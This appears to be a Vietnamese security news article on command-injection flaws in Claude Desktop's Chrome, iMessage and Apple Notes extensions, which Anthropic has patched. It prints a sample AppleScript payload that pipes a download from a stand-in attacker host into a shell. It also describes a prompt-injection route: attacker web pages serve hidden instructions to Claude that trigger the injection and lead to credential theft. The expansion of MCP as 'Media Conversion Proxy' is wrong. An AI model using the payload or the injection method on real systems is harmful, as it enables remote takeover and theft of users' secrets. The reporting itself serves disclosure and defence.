Các nhà nghiên cứu bảo mật đã phát hiện ra các lỗ hổng remote code execution nghiêm trọng trong ba tiện ích mở rộng chính thức của Claude Desktop, được phát triển và xuất bản bởi Anthropic. Những lỗ hổng này đại diện cho một rủi ro bảo mật đáng kể, ảnh hưởng đến người dùng doanh nghiệp và cá nhân. Đây là một minh chứng rõ ràng về tầm quan trọng của việc thường xuyên cập nhật bản vá và kiểm tra bảo mật nghiêm ngặt.

Các trình kết nối Chrome, iMessage và Apple Notes, với tổng số hơn 350.000 lượt tải xuống và giữ vị trí nổi bật trên marketplace tiện ích mở rộng của Claude Desktop, đều chứa một lỗi bảo mật nghiêm trọng chung: command injection không được xử lý.

Phân tích Kỹ thuật về Lỗ hổng CVE và Command Injection

Bản chất của Lỗ hổng Command Injection

Lỗ hổng cốt lõi xuất phát từ việc triển khai command injection cơ bản, một trong những loại lỗ hổng phần mềm lâu đời và được hiểu rõ nhất. Cụ thể, mỗi máy chủ MCP (Media Conversion Proxy) bị ảnh hưởng đã chấp nhận đầu vào do người dùng cung cấp và truyền trực tiếp vào các lệnh AppleScript mà không thực hiện bất kỳ quá trình làm sạch (sanitization) hoặc thoát (escaping) ký tự nào. Điều này cho phép các lệnh AppleScript đó thực thi các lệnh shell với quyền hệ thống đầy đủ.

Cách thức Lỗ hổng được Khai thác

Khi Claude được yêu cầu thực hiện các tác vụ đơn giản, chẳng hạn như mở một URL trong Chrome, tiện ích mở rộng sẽ xây dựng một chuỗi AppleScript sử dụng template literals. Quá trình này chèn trực tiếp URL do người dùng cung cấp vào các lệnh. Một URL được chế tạo độc hại có thể thoát khỏi ngữ cảnh chuỗi hiện tại và tiêm các lệnh AppleScript tùy ý vào quy trình thực thi. Điều này tạo điều kiện cho kẻ tấn công đạt được chiếm quyền điều khiển từ xa.

Ví dụ minh họa cho mã khai thác:

& do shell script "curl https://attacker.com/trojan | sh"&

Trong đoạn mã trên, ký tự `&` được sử dụng để nối thêm một lệnh mới vào chuỗi AppleScript hiện có. Lệnh `do shell script` cho phép thực thi bất kỳ lệnh shell nào. Kẻ tấn công có thể chèn một lệnh `curl` để tải xuống và thực thi một tập tin độc hại (ví dụ: `trojan`) từ máy chủ của họ. Lệnh `| sh` đảm bảo tập tin được tải xuống sẽ được thực thi ngay lập tức bằng shell. Kết quả là mã độc tùy ý sẽ được thực thi trên máy của nạn nhân.

Cơ chế Khai thác thông qua Prompt Injection

Nguy cơ từ Web Content

Khía cạnh đáng lo ngại nhất của những lỗ hổng CVE này là cách chúng có thể dễ dàng bị khai thác thông qua prompt injection qua nội dung web. Claude thường xuyên tìm nạp và đọc các trang web để trả lời câu hỏi của người dùng. Một kẻ tấn công kiểm soát một trong những trang đó có thể nhúng các hướng dẫn độc hại nhằm khai thác các tiện ích mở rộng dễ bị tổn thương.

Kịch bản Tấn công Thực tế

Hãy xem xét một người dùng hỏi Claude một câu hỏi đơn giản, chẳng hạn như “Tôi có thể chơi paddle ở Brooklyn ở đâu?”. Claude sẽ tìm kiếm trên web. Nếu một trong các kết quả tìm kiếm tình cờ là một trang do kẻ tấn công kiểm soát, máy chủ của kẻ tấn công có thể phát hiện User-Agent của Claude và phục vụ một payload ẩn chứa lệnh command injection độc hại.

Từ góc độ của người dùng, Claude sẽ chỉ đơn thuần thực hiện công việc của nó. Tuy nhiên, đằng sau hậu trường, mã được tiêm có thể thực hiện nhiều hành vi độc hại nghiêm trọng. Việc này có thể dẫn đến hệ thống bị xâm nhập toàn diện, đe dọa đến toàn bộ hệ thống của tổ chức.

Tác động và Rủi ro An ninh Nghiêm trọng

Quyền hạn không giới hạn

Không giống như các tiện ích mở rộng của Chrome chạy trong các quy trình trình duyệt được sandbox hóa, các tiện ích mở rộng của Claude Desktop chạy hoàn toàn không được sandbox hóa với quyền hệ thống đầy đủ. Điều này khiến các lỗ hổng remote code execution trở nên đặc biệt nguy hiểm. Theo báo cáo của các nhà nghiên cứu bảo mật, các tiện ích này có thể:

• Đọc bất kỳ tệp nào trên hệ thống.
• Thực thi bất kỳ lệnh nào tùy ý.
• Truy cập vào các thông tin xác thực nhạy cảm.
• Sửa đổi cài đặt hệ thống.

Tham khảo thêm chi tiết từ báo cáo của các nhà nghiên cứu bảo mật tại Koi.ai Blog.

Chuỗi Tin cậy bị Phá vỡ

Chuỗi tin cậy từ ứng dụng chat client đến nội dung web, và cuối cùng là thực thi lệnh cục bộ, cấp cho kẻ tấn công từ xa quyền truy cập shell cục bộ. Điều này có nghĩa là một câu hỏi tưởng chừng vô hại có thể biến thành một cuộc tấn công chiếm quyền điều khiển hoàn toàn hệ thống. Kẻ tấn công có thể khai thác điểm yếu này để thực hiện nhiều hoạt động độc hại, gây ra mối đe dọa mạng nghiêm trọng cho người dùng và tổ chức.

Các Hành vi Tấn công Tiềm năng

Mã được tiêm có thể dẫn đến hàng loạt các hậu quả nghiêm trọng, bao gồm:

• Đánh cắp khóa SSH và thông tin xác thực AWS.
• Rò rỉ token phiên làm việc (session tokens).
• Tải lên các kho lưu trữ mã nguồn cục bộ.
• Cài đặt backdoor dai dẳng để duy trì quyền truy cập.
• Chụp ảnh màn hình và ghi lại thao tác gõ phím (keystrokes).

Những khả năng này làm nổi bật mức độ nghiêm trọng của lỗ hổng và rủi ro đáng kể mà nó đặt ra cho an toàn thông tin của người dùng.

Biện pháp Khắc phục và Bài học Quan trọng

Tình trạng Vá lỗi

Anthropic đã xác nhận các lỗ hổng này là nghiêm trọng và đã phát hành các bản vá cần thiết để khắc phục chúng. Việc áp dụng kịp thời các bản vá bảo mật này là điều tối quan trọng đối với tất cả người dùng các tiện ích mở rộng của Claude Desktop.

Lời nhắc nhở về An ninh mạng

Sự cố này đóng vai trò là một lời nhắc nhở rõ ràng rằng ngay cả những nhà phát triển đáng tin cậy nhất cũng có thể vô tình đưa vào các lỗi bảo mật nghiêm trọng. Những lỗi này có thể đặt các hệ thống doanh nghiệp vào tình thế rủi ro cao. Các tổ chức và cá nhân cần luôn cảnh giác, thực hiện kiểm tra bảo mật định kỳ và duy trì nguyên tắc bảo mật chặt chẽ để giảm thiểu nguy cơ bảo mật.

Việc kiểm tra đầu vào nghiêm ngặt và xử lý an toàn dữ liệu người dùng là những nguyên tắc cơ bản trong phát triển phần mềm an toàn. Bài học từ những lỗ hổng CVE này nhấn mạnh tầm quan trọng của việc không bao giờ tin tưởng đầu vào của người dùng mà không có quá trình xác thực và làm sạch kỹ lưỡng, đặc biệt khi đầu vào đó được sử dụng trong các lệnh cấp hệ thống.